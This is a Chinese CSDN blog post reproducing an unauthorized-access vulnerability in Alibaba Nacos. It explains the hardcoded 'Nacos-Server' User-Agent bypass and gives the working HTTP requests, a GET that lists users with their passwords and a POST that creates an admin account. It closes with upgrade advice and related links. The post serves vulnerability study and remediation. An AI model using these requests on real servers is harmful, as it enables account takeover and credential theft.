Nacos未授权添加用户

最新推荐文章于 2024-05-16 09:42:23 发布
最新推荐文章于 2024-05-16 09:42:23 发布
阅读量1.6k 收藏 1
点赞数 1
分类专栏: 渗透测试 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_64122957/article/details/132733865
版权

漏洞介绍

Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。

该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。并且利用这个未授权漏洞,攻击者可以获取到用户名密码等敏感信息。

影响版本: Nacos <= 2.0.0-ALPHA.1

漏洞复现

查看用户

访问路径,可以查看用户列表(包含密码)

GET /nacos/v1/auth/users?pageNo=1&pageSize=9
User-Agent: Nacos-Server

添加新用户

1、访问url

http://xxx/nacos/v1/auth/users

2、请求改为post,把修改User-Agent头改为“Nacos-Server”

3、构造数据包添加一个admin用户,然后发送POST请求,返回为200,表示创建用户成功

username=admin123&password=admin123

4、用新账户密码登录则登录成功

漏洞修复

   修复策略就是升级Nacos版本到最新版本。

小小丶斌
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
src实战-两处nacos授权访问
hackzkaq的博客
10-11 259
前几天刚做过nacos授权访问的靶场,所以今天心血来潮去搜索了一下相关资产,没想到还真找到了。
nacos+人大金仓数据源
08-07
2. **安全性**:确保Nacos服务器的安全,避免授权访问。可以配置SSL加密传输,以及设置用户权限控制。 3. **监控与日志**:开启Nacos的监控和日志功能,以便及时发现并解决问题。 4. **备份与恢复**:定期备份...
nacos授权-CVE-2021-29441复现
crowsec
07-21 7614
Nacos 是阿里巴巴推出来的一个新开源项目,是一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。致力于帮助发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。 该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。开发者原意是用来处理一些服务端对服务端的请求。但是由于配置的过于简单。。。...
Nacos漏洞总结复现
最新发布
zzz6583zz的博客
05-16 1027
Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致授权访问漏洞。通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户
Alibaba Nacos授权添加用户
自强不息
07-03 705
生活包含着更广阔的意义,而不在于我们实际得到了什么;关键是我们的心灵是否充实。
Nacos后台系统授权添加管理员
Websec
12-01 4517
2、使用burpsuite构造好请求包,构造的时候需要填好host和端口即可,然后进行repeater,如果返回包显示{"code":200,"message":null,"data":"create user ok!注明:nacos是配置系统,类似于apollo一样,所以生产环境的话会存在很多明文配置好的账号,一般会有redis、mysql、ssh、web等账号。Nacos 提供了一组简单易用的特性集,帮助您快速实现动态服务发现、服务配置、服务元数据及流量管理。'''测试nacos漏洞'''
Nacos创建用户并鉴权图文教程
理想主义的花最终会盛开在浪漫主义的土壤里,我的热情永远不会熄灭在现实的平凡之中,我们终将上岸,阳光万里。
10-21 6067
由于公司正在做nacos的鉴权和账号分配,每一个项目对应一个nacos账号,每一个nacos账号只能访问或操作对应项目的资源,做到项目与项目之前的隔离。通过本篇博客能够成功进行鉴权和账号权限分配。
Nacos授权访问
zkaqlaoniao的博客
12-08 1467
该漏洞发生在nacos在进行认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。但是由于配置的过于简单,并且将协商好的user-agent设置为Nacos-Server,直接硬编码在了代码里,导致了漏洞的出现。Nacos 提供了一组简单易用的特性集,可以快速实现动态服务发现、服务配置、服务元数据及流量管理。通过版本漏洞,攻击者可以在不登陆系统的情况下读取已存在的用户或者添加用户,进而登陆系统,登陆系统后可获取大量配置信息以发起进一步攻击。
Nacos安装指南 Nacos安装指南 Nacos安装指南
02-07
生产环境中,建议开启Nacos的身份验证和授权功能,可以通过修改`conf/security.properties`进行配置。此外,还可以通过HTTPS提供安全的通信。 11. 监控与维护 Nacos提供了一些监控指标,如内存、线程等,可以通过...
nacos-server-2.1.0
07-29
7. **安全性增强**:在2.1.0版本中,Nacos可能进一步加强了安全特性,比如认证、授权机制,确保只有授权用户和应用可以访问和操作配置和服务。 8. **性能优化**:每个新版本通常都会包含性能上的改进。Nacos ...
nacos-server-2.0.4.zip
04-15
- 配置安全策略,如添加访问控制,防止授权的配置修改。 综上,"nacos-server-2.0.4.zip"是一个包含了Nacos服务治理平台的最新版本,它在微服务架构中扮演着重要角色,特别是与SpringCloud的结合使用,极大地...
nacos 1.4.0 windows/linux
11-21
- **配置管理**:通过Nacos控制台或API添加、修改配置,配置实时推送到所有关联的服务实例。 - **监控与日志**:Nacos提供监控接口,可以集成到Prometheus或Grafana等工具中,查看系统运行状态和日志。 5. **最佳...
Nacos授权访问漏洞
00勇士王子的博客
02-27 6296
一般来说,nacos被建议部署在内网中,如果在外网出现,会有很大的风险。
Nacos 授权访问(CVE-2021-29441)
m0_62207170的博客
08-30 958
Nacos 授权访问(CVE-2021-29441)
Nacos 授权访问漏洞
热门推荐
ljy啊虎的博客
09-07 2万+
Nacos 授权访问漏洞 /nacos/v1/auth/users?pageNo=1&pageSize=9
【渗透实战】Nacos授权访问(CVE-2021-29441)
Nafia的博客
02-20 3026
Nacos授权访问漏洞挖掘记录
Nacos授权访问复现及修复
大数据姐姐
01-22 3307
Nacos授权访问修复,开启鉴权
Nacos 授权访问漏洞复现
weixin_58609150的博客
07-08 616
POST http://IP:端口/nacos/v1/auth/users?漏洞地址:GET http://IP:端口/nacos/v1/auth/users?输入任意密码bp抓包修改返回包即可绕过进入后台。抓包将get方式修改为post并重放。
nacos查看开放地址_Nacos 授权访问漏洞 小试身手
weixin_39805087的博客
01-31 689
声明:曾接触过nacos,仅测试相关漏洞,除添加白名单外修改其他配置,如有疏漏还请见谅。简介:Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组简单易用的特性集,帮助您实现动态服务发现、服务配置管理、服务及流量管理。Nacos 帮助您更敏捷和容易地构建、交付和管理微服务平台。Nacos 是构建以“服务”为中心的现代应用架构(例如微服务范式、云原生范式)的服务基础设...
nacos授权访问漏洞 修复
07-15
对于Nacos授权访问漏洞,建议你采取以下措施进行修复: 1. 更新到最新版本:确保你使用的Nacos版本是最新的,因为最新版本通常包含了安全修复和漏洞修复。 2. 配置访问控制:通过配置适当的访问控制策略,限制只有授权用户或者IP可以访问Nacos。可以使用Nacos的权限管理功能来实现。 3. 强化认证和授权:启用强密码策略,使用复杂的密码,并定期更换密码。确保只有授权用户具有适当的权限来访问和管理Nacos。 4. 防火墙设置:配置防火墙来限制对Nacos的访问,只允许来自可信源IP地址的请求。 5. 安全审计日志:启用安全审计日志功能,记录所有关键操作和访问日志。这有助于发现异常行为和及时应对潜在的安全威胁。 6. 定期备份:定期备份Nacos的数据,以防止数据丢失或损坏。备份可以帮助你在遭受攻击或数据丢失时快速恢复。 7. 安全漏洞扫描和测试:与安全团队合作,进行定期的安全漏洞扫描和安全测试,以发现并修复潜在的安全问题。 8. 及时响应:如果你发现任何安全问题或漏洞,应立即采取措施进行修复和调查。可以向Nacos官方团队报告漏洞,并升级到已修复漏洞的版本。 请记住,安全是一个持续的过程,需要不断地关注和改进。通过以上措施,你可以提高Nacos安全性,并减少授权访问漏洞的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值